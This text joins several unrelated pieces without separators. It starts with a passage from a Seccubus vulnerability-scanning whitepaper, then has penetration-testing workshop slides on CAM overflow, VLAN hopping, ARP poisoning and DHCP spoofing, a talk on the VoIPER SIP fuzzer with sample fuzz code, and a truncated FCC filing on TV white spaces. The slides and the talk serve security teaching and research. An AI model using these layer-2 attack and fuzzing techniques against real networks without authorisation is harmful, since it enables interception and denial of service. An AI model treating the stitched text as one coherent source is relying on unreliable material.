infrastructure by computing the delta between the results of the current and previous scan. Let say that we are scanning a new infrastructure for the first time, the scanner runs and sends its results back to Seccubus. Seccubus will produce the standard scanner reports and make them available for download in the Seccubus web interface. Besides standard reports, Seccubus will also parse the scan results and put each individual finding in the web interface and assign it the status ‘New’. It is now up to the assessor to assign a new status to these findings. ‘No Issue’ if the finding does not pose a security risk or ‘Open’ if the finding does. After a while, hopefully after some of the findings have been addressed, another scan can be performed. Seccubus will again import the findings in the web interface, but this time the status is dependant or the previous scan. Seccubus will change the status of the finding to: » New – If finding was not present in previous scan. » Changed – If finding was present in previous scan, but has changed » Gone – If finding was present in a previous scan, but not in current scan. Instead of having to examine all findings again, the assessor now only has to deal with the findings with these three statuses. 2.2 What is the gain? Automating vulnerability scanning with Seccubus has the following advantages: » Scans can be scheduled and start without the need for a human to ‘push the button’; » The effectiveness of scanning is improved. Less effort is spent on scanning and more scans can be done with the same resources; » The quality of the analysis improves; since less time is spend on mundane tasks. D R A F T for Public release title Seccubus version 1.0 6 date 18 March 2010 PUBLIC author Frank Breedijk 2.3 Case: Schuberg Philis Since I work at Schuberg Philis we were also the first to use Seccubus in August 2007. We scan all external IP addresses of all our customers. In total over 4000 IP addresses, resulting in a total of 8777 findings. Without Seccubus we would simply be unable to do this efficiently. 2.4 Seccubus’ vital statistics Program name: Seccubus Website: www.seccubus.com Mailing list: seccubus-list@seccubus.com License: GPLv3 Copyright holder: Schuberg Philis Author: Frank Breedijk Support: Via website and mailing list Downloads so far (March 2010): 2370 D R A F T for Public release title Seccubus version 1.0 7 date 18 March 2010 PUBLIC author Frank Breedijk 3 Conclusion Seccubus automates execution and analysis of vulnerability scans so more scans can be performed with the same resources while maintaining accuracy. More scanning can be performed in less time. Because infrastructures can be scanner more often, more vulnerabilities are identified and remediated. This means the overall security is increased. D R A F T for Public release title Seccubus version 1.0 8 date 18 March 2010 PUBLIC author Frank Breedijk 4 About the author Frank Breedijk B ICT is currently employed as Mission Critical Engineer Security at Schuberg Philis, a leader in mission critical outsourcing services. He is responsible for the technical information security of Schuberg Philis’ services, including security awareness, vulnerability management, internal security consultancy and technical audits and the development of Seccubus. Frank has been professionally active in IT since 1997 when he stared as a programmer for PTS Software. His career in IT security stared in 2000 when he became ICT Security Officer for InterXion. Frank has worked as IT security consultant and managed Unisys’ Security Operation Center for managed security for EMEA. Besides his day job Frank is active on Twitter as @Seccubus, writes blog entries for www.Cupfighter.net and develops and maintains Seccubus. He can be reached via his Twitter account or email him at fbreedijk@schubergphilis.com
HackingDojo.com HackingDojo.com Education Masters Degrees in Computer Security: ▪ Computer Science ▪ Management Author since 2007 Professional Penetration Testing Ninja Hacking Netcat Power Tools Penetration Testing’s Open Source Toolkit, V2 Certifications ISSMP, CISSP, SCSECA, SCNA, SCSA, IEM/IAM HackingDojo.com Education The George Washington University (MA) University of Redlands (BA) Author multiple articles Network Forensics: The Tree in the Forest The Security Consulting Sugar High Hack First, Policy Second – A mobile Device Story Certifications CISSP CCISO Certified Computer Forensic Specialist HackingDojo.com Learn how to use Kali Linux to attack network protocols CAM Table Overflow VLAN Hopping ARP Poisoning DHCP Spoofing If you know how to do this, please give up your seat so others can join in (assuming we have a full class) HackingDojo.com Pre-installed Kali Linux Prefer to have it as the main OS, not virtualized CAT5 cable of sufficient length We didn’t know in advance how the rooms would be, so please bear with us when we get everyone connected Patience 4 hours, 4 tasks, a LOT of network congestion This is a HOSTILE NETWORK!! HackingDojo.com Do / Don’t Everyone is here to learn, so don’t impede others Embrace other people’s genius Workshop = Group Effort, work as a team Workshop != Taking over someone else’s keyboard We’re here to learn, not be pedantic over terms HackingDojo.com Content Addressable Memory Table Layer 2 (Switch) Records MAC addresses and saves them for switching purposes HackingDojo.com HackingDojo.com Overflow it, and have no mercy! When CAM table fills up, it pushes all data out all ports* Essentially, you turn a Switch (L2) into a Hub (L1) #macof <- tool of choice Collect the data Need to collect the packets as it leaves the switch Wireshark is probably the best-known tool, but any pcap capturing app will work HackingDojo.com Good to use when ARP Spoofing is: monitored or blocked Too much traffic across the network Want to attack system on your switch, not within the Broadcast Domain HackingDojo.com DEMO Hands-on lab Start next topic at top of the hour HackingDojo.com Virtual Local Area Network (VLAN) Broadcast Domain Allows multiple broadcast domains on a single switch HackingDojo.com Not going to discuss Trunking Protocol Attack Double Tagging requires us to be on VLAN1 HackingDojo.com Not going to discuss Trunking Protocol Attack Double Tagging: Requires us to be on VLAN1 Adds the target VLAN between payload and VLAN1 tag Once the VLAN 1 tag gets stripped, the second switch reads the VLAN 20 tag Why does this work? No tag = VLAN 1 HackingDojo.com Time to crush your hopes Double Tagging only works one way All attacks are blind – the target server follows the rules Attack options include: ▪ Reflective ▪ DoS Reference: https://www.sans.org/reading- room/whitepapers/networkdevs/virtual-lan-security- weaknesses-countermeasures-1090 HackingDojo.com You have the ability to redirect the attack Proof of concept DoS HackingDojo.com DEMO Hands-on lab Start next topic at top of the hour HackingDojo.com Types of Poisoning ARP ICMP DHCP Port Stealing Perform Man-in-the-Middle Attack Need to be able to collect packets Limited to BROADCAST DOMAIN only HackingDojo.com Trick question: Which OSI Model layer does it reside in? We are going to pretend and just say Layer 2 Easier on the mind to just play dumb What does it do? Takes IP addresses and resolves them to MAC addresses HackingDojo.com We can pick two (or more systems) and poison their ARP table Typically the targets are: The Default Gateway Everyone else in the Broadcast Domain HackingDojo.com Warnings! When using ettercap, don’t use <CTRL>-C to stop the attack Remote internal pentests are a PAIN!! RDP stops working when you use ettercap (hint: “timeout”) Start slow – you can impact production When conducting a pentest, make sure you’re in a valid employee subnet READ THE PCAP FILE – don’t just trust the logs HackingDojo.com Any time I use it at the beginning of a test, and when I want to target a specific system (admin, etc.) Start slow One or two minutes at first, build up from there once you know you’re not impacting the network HackingDojo.com DEMO Hands-on lab Start next topic at top of the hour HackingDojo.com Saved the worst for last This will mess up your DHCP Table… Mess up the network for hours, days… Great way to create a DoS for a network… Crosses routers into neighboring networks… Used to pass bogus information to target systems, like default gateway HackingDojo.com Mandatory Information passed in DHCP Offer: Client IP address DHCP Address Gateway IP Address …more Optional information: Lease Time (Cisco default: one day) Time Server Name Server Domain Name Server Domain Name Host Name HackingDojo.com HackingDojo.com To work, we need to either race against the DHCP Server, or starve out ALL the DHCP addresses of the valid DHCP Server As a last resort, only after permission granted Proof of concept Small organizations There will be calls to help desk HackingDojo.com DEMO Hands-on lab Leave when done THANKS FOR JOINING US! Any feedback, please send to info@hackingdojo.com HackingDojo.com
Finding VoIP vulnerabilities while you sleep Background info on VoIP and previous research Introduction to VoIPER Description of some of its features Some demos and usage examples The results of my testing Q&A From Ireland Just finished a Bsc in Computer Systems About to start a Msc in Computer Science Interested in pretty much anything to do with hacking, security and computers in general http://www.unprotectedhex.com Using the IP network to route voice data Can be used exclusively of the traditional phone network or in tandem Variety of devices typically involved Many familiar companies from networking and telecoms Cisco Nortel Avaya Seeing steady adoption across the board ~50% of large businesses are using it in some form in 2008 Why so popular? Reduced costs – Average of 20% reduction Location independence Independence from telcos SIP H.323 H.225 H.239 H.245 RTCP SDP MGCP IAX2 Skype H.460 H.450 RTP STUN RSVP SS7 ….and so on Sponsored by the IETF Open standard – RFC 3261 Similar in format to HTTP One of the most popular protocols for consumer devices Used for command and control e.g. session initiation and teardown Other protocols handle data transfer e.g. RTP Carried as the content in certain SIP requests Negotiates the codecs to use for the session Audio Video Extended to cover ‘Fax over IP’ (T.38) Human readable Combined with SIP, forms an incredibly flexible protocol set INVITE sip:201@ SIP/2.0 CSeq: 536870905 INVITE Via: SIP/2.0/UDP;branch=z9hG4bKmj1079uq From: "VoIPER" <sip:201@>;tag=hkuybniovshg Call-ID: jqzedy9kvtrmaw1@TheKlatchianHead To: "201" <sip:201@> Content-Type: application/sdp Content-Length: 378 v=0 o=- 1190505265 1190505265 IN IP4 s=Pwning your SIP c=IN IP4 m=audio 5028 RTP/AVP 101 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-15 ITU sponsored Dominant in the backbone of voice networks and large enterprise deployments A system specification describing the use of various other protocols including: Registration, Admission and Status (H.225) Call signalling (H.225) Multimedia control and capability determination (H.245) Integrates the voice communications of an organisation into an environment the attacker is familiar with Same protocols, tools and environments Open standards and accessible devices Scary as hell when you think about it – you just moved your entire comms infrastructure to our playground Cheers! Not quite … Complex operating systems Functional TCP/IP stack Run a variety of services Introduces a whole new attack vector into your network Targetted ‘C’ level attacks Botnets Eavesdropping Worms DoS attacks on communications infrastructure Every other attack you get on a TCP/IP network Two possible viewpoints Attacking the protocol design Authentication Authorization Encryption Attacking the protocol implementation Aiming to find vulnerabilities leading to DoS or remote code execution Performed in the same fashion as an attack on any network service Enumeration, scanning, cracking accounts, MITM attacks, flooding etc. Using the last X years experience of attacking TCP/IP based protocols Threats can be managed using the same methodologies as any network service Plenty of tools available ‘Traditional’ ones such as nmap and co. More specialised ones such as SIPVicious and VoIPHopper SIPVicious Incorporates tools for mapping a network, finding user accounts and cracking their passwords VoIPHopper Jumping between VLANs What VoIPER is all about A number of other tools available PROTOS KiF INTERSTATE Codenomicon, Mu Dynamics etc Generally successful at finding bugs A few drawbacks to each Some limitations of current tools Closed source or difficult to acquire Difficult to extend or modify Limited test sets Primitive/No support for crash detection and other features required for full automation Cross platform, open source VoIP fuzzing toolkit Currently aimed at the SIP and SDP protocols Protocol aware backend that can manage SIP sessions and manipulate the device under test into different states Extensive logging, target management and crash recreation tools Automation ftw! ~10 ready-to run SIP and SDP fuzzers Cover the vast majority of their RFCs and generate well over 200,000 tests Fire-and-forget - No protocol knowledge required by the user Mapped out using the Sulley Fuzzing Framework Delivered using the VoIPER SIP core • Mapping: s_static("Content-Length: ") s_dword(512, fuzzable=True, format=“ascii”) s_static("\r\n") • Example header: Content-Length: -1 • Hilariously enough caused a certain VoIP client to crash Basic SIP library SIP user agent Transaction management system Collection of pre-made SIP transaction descriptions Manipulates the target device into the required state for the test Allows the fuzzer to inject fuzz tests into any part of the protocol state invite_with_cancel_dict = {sip_parser.r_SEND : (invite.valid, { sip_parser.r_1XX : (cancel.valid, { sip_parser.r_2XX : (None, None), sip_parser.r_4XX : (ack.fuzz, None) } ) } ) } Two types provided Protocol based Process based Essential for full automation of the fuzzing process Allows for detailed reporting Starting/Restarting the target device Minimises the amount of monitoring and interaction required Useful against some devices that suffer from chronic DoS syndrome Requires a script running on the target device Built on components from Sulley A crash is useless if we can’t recreate it on demand! Post crash logging should allow automatic recreation of a particular issue Process based crash detection provides extra crash info that can help I’m in ur network breakin ur stuff So…..did it work? Initial testing focused on 4 VoIP clients Ekiga Gizmo5 Twinkle NCH Business Talk Testing SDP and SIP INVITE processing Plenty of encouragement to test the rest of the SIP protocol and other devices Single-packet-o-death crash in all devices Types of bugs Null pointer dereferences Memory corruption Any product that has the letter ‘NCH’ in its title should be avoided like the plague Fuzzer + crash detection + target management == bug hunting while you sleep Possible to start testing essentially any SIP device in a matter of seconds Usable by anyone with half a brain Easily extendable if it doesn’t do exactly what you want Thanks Terron Williams Everyone else who helped out in the beta testing Everyone on STS/OTW that helped out http://www.unprotectedhex.com http://www.unprotectedhex.com/voiper- wiki/ http://voiper.sourceforge.net Questions?
Before the FEDERAL COMMUNICATIONS COMMISSION Washington, D.C. 20554 In the Matters of Unlicensed Operation in the TV Broadcast Bands Additional Spectrum for Unlicensed Devices Below 900 MHz and in the 3 GHz Band ET Docket No. 04-186 ET Docket No. 02-380 COMMENTS OF DELL INC., GOOGLE, INC., THE HEWLETT-PACKARD COMPANY, INTEL CORP., MICROSOFT CORP., AND PHILIPS ELECTRONICS NORTH AMERICA CORP. Scott Blake Harris Edmond J. Thomas∗ S. Roberts Carter III HARRIS, WILTSHIRE & GRANNIS LLP 1200 Eighteenth Street, NW Washington, DC 20036 (202) 730-1300 January 31, 2007 ∗ Senior Policy Advisor Table of Contents SUMMARY ........................................................................................................................... ii I. THE COMMISSION SHOULD AUTHORIZE SPECTRUM SENSING TECHNOLOGY TO ENABLE USE OF LOW POWER UNLICENSED DEVICES IN THE TV WHITE SPACES.................................................................................................................... 3 A. Spectrum Sensing Offers the Best Solution for Identifying and Utilizing Available White Spaces.................................................................................... 3 1. Spectrum sensing is a proven, well understood technique. ........................ 4 2. Proposed operating parameters for spectrum sensing................................. 5 B. The Geolocation/Database and Control Signal Approaches are Neither Practicable nor Desirable.................................................................................. 9 C. Other Operating Parameters............................................................................ 12 1. Transmit power control............................................................................. 12 2. Other technical considerations.................................................................. 13 D. Testing.............................................................................................................. 18 II. THE COMMISSION SHOULD NOT IMPOSE ADDITIONAL RESTRICTIONS ON PERSONAL/PORTABLE UNLICENSED DEVICES.................................................... 18 III. THE WHITE SPACES SHOULD BE ALLOCATED FOR UNLICENSED USE............... 21 A. White Spaces are Ill-Suited for Deployment of Licensed Services................ 21 B. Unlicensed Use of White Spaces Will Provide Substantial Benefits. ............ 23 IV. OTHER ISSUES. ..................................................................................................... 29 A. Out of band Emission Limits.......................................................................... 29 B. Direct Pickup Interference/Receiver Desensitization..................................... 29 C. Wireless Microphones. ................................................................................... 29 D. Unlicensed Use in Border Areas..................................................................... 30 CONCLUSION .................................................................................................................... 31 ii SUMMARY Dell, Google, Hewlett-Packard, Intel, Microsoft, and Philips (collectively the “Coalition”) applaud the Commission’s decision to make available portions of unused spectrum in the television (“TV”) broadcast bands. This decision was a crucial first step towards providing broadband access to millions of Americans and enabling a wide range of innovative wireless devices and services which are not practical at higher frequencies. However, if the Commission adopts overly restrictive technical and operational rules, this first step could also be the last, depriving the public of tremendous benefits that could be realized by putting the valuable—but fallow—TV white spaces to use. To ensure that the white spaces are used to serve the public, the Coalition herein proposes an approach that will protect incumbent licensees from harmful interference while at the same time maximizing use of the white spaces by innovative unlicensed devices. Specifically, the Coalition urges the Commission to implement the following recommendations: First, with respect to personal/portable unlicensed devices, the Commission should authorize the use of spectrum sensing technology rather than mandating the geo- location/database and control signal approaches discussed in the initial Notice of Proposed Rulemaking. The rigorous testing that the Commission intends to undertake will confirm that spectrum sensing, when implemented with the correct technical parameters as proposed herein, is the most reliable and efficient means of avoiding harmful interference to incumbent licensees. To this end, the Coalition will provide the Commission with a prototype device for testing purposes so that the Commission can confirm that the proposed unlicensed devices which the Coalition plans to market will not cause harmful interference. iii Second, the Commission should authorize the use of personal/portable unlicensed devices contemporaneous with the authorization of fixed devices, and facilitate the use of personal/portable unlicensed devices by imposing the minimum regulation necessary to protect incumbent licensees. Technology has advanced sufficiently such that the high tech industry can manufacture mass market, low power devices for a wide range of innovative services that will protect licensees from harmful interference. These devices, however, cannot and should not operate pursuant to the restrictions applicable to fixed devices; personal/portable devices use lower power than fixed devices, and should be regulated accordingly. Moreover, a market comprised only of fixed devices would be much smaller, thereby limiting economies of scale and scope and potentially causing significant manufacturers to forego market entry—depriving many Americans of innovative wireless services and technologies. Third, the Commission should ensure that the TV white spaces are used for unlicensed operation; spectrum should not be allocated on a licensed basis. The Commission has concluded correctly that unlicensed operations may be better suited to adapt to the “shifting spectrum environment” characterized by low power operations in the TV bands. Indeed, the phenomenal success of the Wi-Fi industry is merely a prelude to the benefits the country can expect from making unused television spectrum available on an unlicensed basis. With so much licensed spectrum already available below 1 GHz (including an additional 60 MHz to be freed up for nationwide licensed use by the DTV transition in the near future), it simply makes no sense to license the TV white spaces as well—particularly since licensing of this “Swiss cheese”, power-restricted spectrum will likely result in substantial underutilization. Moreover, licensing simply is not necessary iv to protect incumbent licensees as some would contend; unlicensed manufacturers are strongly motivated to protect licensed users from harmful interference, and are fully capable of doing so. In short, the Coalition strongly urges the Commission to adopt minimal technical and operational rules that maximize the potential innovative uses of the TV white spaces while protecting the legitimate rights of licensed users. By doing so, the Commission will help ensure that all Americans derive the highest benefit from this valuable, yet presently underused, public resource. BEFORE THE FEDERAL COMMUNICATIONS COMMISSION WASHINGTON, D.C. 20554 In the Matters of Unlicensed Operation in the TV Broadcast Bands Additional Spectrum for Unlicensed Devices Below 900 MHz and in the 3 GHz Band ET Docket No. 04-186 ET Docket No. 02-380 COMMENTS OF DELL INC., GOOGLE, INC., THE HEWLETT-PACKARD COMPANY, INTEL CORP., MICROSOFT CORP., AND PHILIPS ELECTRONICS NORTH AMERICA CORP. Dell, Google, Hewlett-Packard, Intel, Microsoft, and Philips (collectively the “Coalition”) applaud the Commission’s decision in the First Report and Order to grant certain devices access to substantial portions of unused spectrum in the television (“TV”) broadcast bands.1 This decision represents a crucial first step towards providing broadband access to millions of Americans and enabling a wide range of innovative wireless services and technologies, such as self-organizing mesh networks and distribution of high-definition multimedia content throughout the household. As the world’s largest producers of consumer electronics, software, semiconductors, personal computers, and peripheral devices, the Coalition’s members stand ready to commit substantial resources to bring these advancements to consumers. The Coalition’s members believe that the phenomenal success of the billion dollar Wi-Fi industry—which has utilized what was once called “junk” spectrum to lower 1 Unlicensed Operation in the TV Broadcast Bands; Additional Spectrum for Unlicensed Devices Below 900 MHz and in the 3 GHz Band, First Report and Order and Further Notice of Proposed Rule Making, 21 FCC Rcd. 12266 (2006) (“Further Notice” or “FNPRM”). 2 infrastructure costs and enable widespread, flexible broadband access—is merely a prelude to the benefits that can be achieved from opening up unused TV broadcast spectrum. For the first time, the public will have access to broadband-capable unlicensed spectrum below 900 MHz, and industry will be able to offer consumers a range of new products and services that take advantage of the superior propagation characteristics of this spectrum. In order to realize this vision, the Commission must strike the appropriate balance between the interests of incumbent license holders and the public’s right to use the airwaves in innovative ways. The existing users of the TV bands should be afforded the interference protection accorded to them by their licenses, but the overreaching measures proposed by some incumbents extend far beyond the rights their licenses provide, and are not necessary to protect licensees. 2 In fact, such measures will serve only to foreclose the benefits that full utilization of these bands can offer to millions of Americans. Innovative use of the 2.4 GHz band—which currently accommodates over one billion devices—has been driven by the substantial flexibility and unlicensed access afforded to users of that band. Successful utilization of the TV white spaces will require a similar approach. The Coalition therefore is encouraged by the Commission’s recognition in the Further Notice that overly restrictive technical rules will render use of the TV white spaces infeasible, and endorses the Commission’s decision to conduct independent testing to determine the actual level of interference protection necessary for incumbents. In short, the Commission should adopt regulations that ensure the maximum 2 For example, broadcasters have opposed the use of portable devices in the white spaces, and also have opposed allocating spectrum in these bands for unlicensed devices. See generally Joint Comments of the Association for Maximum Service Television, Inc. and the National Association of Broadcasters (filed Nov. 30, 2004) (“MSTV and NAB Comments”). 3 flexibility for innovation in the white spaces, while still protecting incumbent licensees from harmful interference. I. THE COMMISSION SHOULD AUTHORIZE SPECTRUM SENSING TECHNOLOGY TO ENABLE USE OF LOW POWER UNLICENSED DEVICES IN THE TV WHITE SPACES. A. Spectrum Sensing Offers the Best Solution for Identifying and Utilizing Available White Spaces. The Coalition enthusiastically endorses the Commission’s initial determination that devices operating in the TV white spaces could employ spectrum sensing to determine that a particular channel is available for use,3 and encourages the Commission to authorize spectrum sensing for low power personal/portable devices. Spectrum sensing will protect incumbent licensees and facilitate spectrum sharing with other low power devices in the white spaces, while avoiding the operational difficulties and economic burdens associated with the other interference avoidance mechanisms identified in this proceeding. In addition, since spectrum sensing does not depend on third party “assisting” technologies (such as databases of available channels and/or broadcast beacons) to implement, a spectrum sensing approach will better facilitate the creation of a mass market for devices – resulting in more affordable consumer products and more attractive prospects for wireless broadband, including in rural areas. In fact, it may be the single most significant action taken by the Commission to bring broadband access to rural America. 3 See FNPRM ¶ 3 (“We propose to require that TV band devices employ spectrum sensing to determine when TV channels are unused and to incorporate a dynamic frequency selection (DFS) mechanism to ensure that TV band devices operate only on vacant TV channels.”). 4 1. Spectrum sensing is a proven, well understood technique. The primary concern raised to date by incumbent licensees with respect to spectrum sensing is that this approach is unproven.4 However, this is simply not the case. Wi-Fi devices operating in the unlicensed bands have been employing spectrum sensing technology for over 10 years. Moreover, as the Commission has recognized, the authorization of U-NII devices employing dynamic frequency selection (“DFS”) in the 5 GHz band provides a valuable precedent for the Commission to consider when determining the appropriate approach for interference avoidance in this proceeding.5 As discussed below, the Coalition advocates an even more conservative means of detecting protected signals than that used by U-NII devices. In order to protect incumbent licensees, the Coalition recommends -114 dBm as the threshold for establishing channel vacancy, 50 dB more than the Commission requires for U-NII devices. Although the Commission correctly notes that differences between incumbent military radar in the 5 GHz band and TV broadcast signals will require modifications to the U-NII DFS approach, most of these differences make the case for spectrum sensing in the TV bands even more compelling. Unlike military radar, TV signals are designed to be detected. While differences between the bands will require different technical standards, the Coalition is confident that the Commission’s prototype device testing will confirm that the Coalition’s proposed operating parameters will protect licensees from harmful interference. Spectrum sensing obviates the need for base stations, geo-location 4 See, e.g., MSTV and NAB Comments at 15 (“While [spectrum sensing] technology may hold promise, the Commission cannot risk the health of the public’s broadcast television service today on the basis of technology that may or may not be developed tomorrow.”). 5 See FNPRM ¶ 34 (“We agree that the experience gained in developing the rules for 5 GHz U-NII is informative in considering the development of sensing techniques in the TV spectrum.”). 5 or control signals, and the Commission should authorize its use for unlicensed personal/portable devices. 2. Proposed operating parameters for spectrum sensing. In its initial NPRM, the Commission proposed to limit the maximum power output of unlicensed personal/portable devices to 100 mW, with a maximum transmit and receive antenna gain of 6 dBi.6 In order to further reduce the likelihood of harmful interference, the Coalition recommends a maximum of 0 dBi for receive and transmit antennas rather than the 6 dBi gain proposed by the Commission. This restriction will result in an EIRP which is 6 dB less than was suggested by the Commission. The Coalition further notes that the operating parameters it suggests below will cause the unlicensed device to frequently transmit at powers less than its proposed maximum EIRP of 20 dBm.7 The Commission seeks comment on the appropriate level of sensitivity a device must have when determining the presence of other signals (i.e., the “detection threshold”).8 The correct detection threshold must protect existing licensed uses, while at the same time not being so restrictive as to limit the usefulness of the unlicensed devices operating in the white spaces. As the Further Notice explains, “a lower detection threshold infers greater interference protection for services operating in the TV spectrum, 6 See Unlicensed Operation in the TV Broadcast Bands; Additional Spectrum for Unlicensed Devices Below 900 MHz and in the 3 GHz Band, Notice of Proposed Rule Making, 19 FCC Rcd. 10018 (¶ 22) (2004) (“Notice” or “NPRM”). 7 See, e.g., discussion of transmit power control, infra p. 12. 8 FNPRM ¶ 35. 6 but could also result in increased false positives as a response to spurious radio noise … sharply reducing the usefulness of this spectrum for TV band devices.”9 In determining an appropriate detection threshold, the Coalition recommends that the Commission use Threshold of Visibility (“TOV”) as the measurable and verifiable proxy for TV channel vacancy at the Grade B Contour. TOV is the received signal level at the input terminals of the TV receiver below which the DTV receiver cannot reproduce the transmitted picture. Accordingly, it is reasonable to conclude that a channel is vacant at a particular time and geographic location when the signal falls below TOV. The Commission already has determined that existing DTV receivers are able to provide service until the signal level at the input terminal to the receiver falls below approximately –84 dBm (TOV) for UHF signals, and slightly higher for VHF.10 However, because the relative position of the TV transmitter, the TV receiver antenna, and the unlicensed device are unknown, a lower detection threshold is required for the unlicensed device to determine if a TV channel is vacant. The Coalition proposes that the detection threshold of the unlicensed device be set by the Commission at 30 dB below the Commission’s established threshold of visibility, or -114 dBm. As set forth below, because the Coalition’s prototype device is designed to detect analog as well as digital signals, the -114 dBm detection threshold also will provide the protection necessary for licensed wireless microphones and other incumbent analog operations. 9 Id. ¶ 38. 10 DTV receivers currently on the market are able to provide service at TOV at the following signal levels: -82.2 dBm (low VHF), -83.2 dBm (high VHF), and – 83.9 dBm (UHF). See Stephen R. Martin, Tests of ATSC 8-VSB Reception Performance of Consumer Digital Television Receivers Available in 2005, FCC/OET TR 05-1017 at 8-4 (Nov. 2, 2005). 7 While the Commission has expressed some concern that a spectrum sensing approach could be subject to a “hidden node” problem,11 the -114 dBm detection threshold proposed by the Coalition provides sufficient margin to resolve this potential issue. A “hidden node” problem can occur when an obstacle such as a building sits between a licensee’s signal and the device performing signal detection. Citing this phenomenon, broadcasters erroneously contend that the unlicensed device would be unable to protect an otherwise usable TV signal and may begin transmitting, thus causing harmful interference (e.g., a nearby TV receiver is connected to an antenna on a roof that is placed above the obstruction blocking the signal to the unlicensed device). However, there are several reasons why the risk of a hidden node problem is for practical purposes eliminated in the TV band context using the detection threshold proposed by the Coalition. As the Commission has observed, the TV bands have superior propagation characteristics, 12 which substantially reduce the likelihood that an incumbent licensee’s signals will be blocked. Moreover, unlike a TV receiver, an unlicensed sensor does not have to demodulate and reproduce a picture to perform its function. It only has to confirm the presence of a signal—a task that can be accomplished for signals substantially weaker than those required to reproduce a transmitted picture. Indeed, as the Commission explained in the Cognitive Radio NPRM, “[t]he use of a feature detector much more sensitive than the TV receiver … makes [a hidden node problem] much less 11 See FNPRM ¶ 39 (noting that hidden nodes are a “potential problem” for spectrum sensing and requesting views on the scope of the problem). 12 See id. ¶ 1 (noting that “transmissions in the TV band are subject to less propagation attenuation than transmissions in other bands where lower power operations are permitted”). 8 likely.”13 Furthermore, transmit power control (“TPC”) capabilities for TV band unlicensed devices (discussed below) would further reduce the likelihood of harmful interference to incumbent licensees in the TV bands.14 As the following examples illustrate, the proposed -114 dBm detection threshold is more than sufficient to protect broadcast services from harmful interference: Example 1 - A DTV signal with a 6 dB gain outdoor TV antenna is -90 dBm and the cable from the antenna to the TV is lossless. The signal at the input of the receiver will be at TOV or -84 dBm (+6 dB - 90 dBm). Assuming that the building DTV signal attenuation at the unlicensed device is 15 dB, and the unlicensed device employs a 0 dB (unity gain) omnidirectional antenna, the received signal at the unlicensed device will be -105 dBm (-90 dBm - 15dB). So if the detection threshold for the unlicensed device is set at -114 dBm, the device will conclude that the channel is occupied with 9 dB of margin to spare. Example 2 - A TV is attached to a 0 dB (unity gain) indoor antenna instead of an outdoor antenna. The TV will then receive a signal of -105 dBm (-90 dBm - 15dB) producing no visible picture. Since the unlicensed device will still receive a signal of -105 dBm, it will conclude that the channel is occupied and not transmit on it (even though it would cause no harmful interference even if it did transmit). 13 Facilitating Opportunities for Flexible, Efficient, and Reliable Spectrum Use Employing Cognitive Radio Technologies; Authorization and Use of Software Defined Radios, Notice of Proposed Rule Making and Order, 18 FCC Rcd. 26859, 26869 (¶ 25 n. 35) (2003) (“Cognitive Radio NPRM”). 14 See FNPRM ¶ 45 (“[W]e invite comment as to whether we should permit adjustments to any TV band device operating parameters, such as the detection threshold, if a TV band device operates at a power level substantially below the limit.”). 9 Though these two simple examples do not represent all possible situations, they do provide confidence that a -114 dBm detection threshold provides more than adequate protection. Coalition empirical testing, hopefully to be verified by Commission testing, eliminates any doubt that -114 dBm is more than sufficient to protect all incumbent license holders. In short, spectrum sensing provides a reliable means of determining whether a particular channel is available for use by an unlicensed device. The Coalition fully endorses its use and urges the Commisson to do the same. B. The Geolocation/Database and Control Signal Approaches are Neither Practicable nor Desirable. The Commission also seeks additional comment on the geo-location/database and control signal approaches discussed in the initial Notice of Proposed Rulemaking in this proceeding.15 Even assuming that these approaches are feasible, however, the Commission should not make either approach mandatory for personal/portable devices. Most importantly, each of these solutions requires the creation and maintenance of centralized infrastructure to utilize the white spaces, which would eliminate the ability to create organic, decentralized networks. Thus, mandating either of these approaches would deprive the white spaces of the flexibility that has characterized the success of the 2.4 GHz band. Concerns raised by the Commission in the Further Notice with respect to these mechanisms further underscore why a pure spectrum sensing approach provides a superior alternative for preventing harmful interference to incumbent licensees. 15 Id. ¶¶ 49-55. 10 First, as the Commission has observed, a complete database of TV stations must be created and updated in real-time.16 The Commission notes that it could rely on a private party to maintain such a database,17 but this approach would add unnecessary costs, such as administrative fees for access to the database. An approach dependent on third party infrastructure deployments could also create a disastrous Catch-22: database and/or control signal providers may not offer services unless they believe that the number of unlicensed devices would make it profitable to do so, while manufacturers and service providers may not invest resources unless they are certain a viable database/control signal is available. It is therefore easy to conceive of a situation where no one moves forward and, in spite of the Commission’s efforts, the TV white spaces remain unused. Moreover, even assuming the existence of a database provider, this approach raises other operational concerns.18 With respect to the geo-location approach, the requirement that a base station communicate with an unlicensed device will require a service provider to lease space to situate the base station. Such a requirement will delay, if not effectively prohibit, deployment and add substantial additional costs. Professional installation would add even more costs, and would be inapplicable to personal/portable devices. While unlicensed outdoor devices could employ GPS technology in lieu of professional installation, indoor GPS receivers often are unable to communicate with 16 Id. ¶ 50. 17 Id. 18 See id. ¶ 51 (“If a device is professionally installed, who should be permitted to install it? What is the appropriate method of determining the required separation from authorized users in the TV bands? How will the geo-location/database approach protect other authorized services, such as wireless microphones, the location of which may not be included in the databases?”). 11 GPS satellites. The Commission has asked about the possibility of implementing Assisted GPS (“AGPS”) to make position fixes more likely in areas where GPS signals are weak,19 but AGPS requires access to a reference network—such as the cellular networks deployed by CMRS providers—to “assist” the GPS receiver by transmitting data that helps the device determine its location. To the Coalition’s knowledge, no CMRS provider has made access to their networks commercially available for this purpose. Even assuming that such access could be obtained, it would add yet another unnecessary cost for devices, further decreasing the likelihood of economic viability. Addressing the above issues might make a geo-location/database approach a technologically viable mechanism for interference avoidance, but at best it would remain more cumbersome and significantly more costly than a spectrum sensing approach, with no offsetting benefit. A solution based on control signals presents even greater implementation concerns.20 As with geo-location, sending a control signal to a device containing a listing of vacant TV channels in the signal’s service area would require the creation and maintenance of a real-time TV database, with the resulting unnecessary costs. A number of parties also have raised concerns about such an approach even in areas where control signals would be available, including conflict of interest problems associated with 19 Id. ¶ 51 n. 64. 20 While the NPRM initially proposed a control signal requirement for personal/portable unlicensed devices, the FNPRM recognized the possibility that “one interference avoidance scheme could be used effectively for both types of TV band devices.” FNPRM ¶ 25. For the reasons set forth below, the Coalition strongly opposes a mandatory control signal requirement, and urges the Commission to make clear that it will not impose such a requirement on personal/portable devices. 12 allowing broadcasters to operate and/or charge for access to control signal information,21 as well as the potential for devices to receive conflicting signals from multiple sources.22 C. Other Operating Parameters. 1. Transmit power control. The Commission proposes to employ transmit power control (“TPC”) limits for unlicensed devices operating in the TV band.23 The Coalition supports TPC requirements, which “further reduce the potential for interference”24 and provide an even greater degree of confidence that a spectrum sensing approach will protect incumbent users. Consistent with the requirements for U-NII devices in the 5 GHz band, the Commission proposes to require a TPC 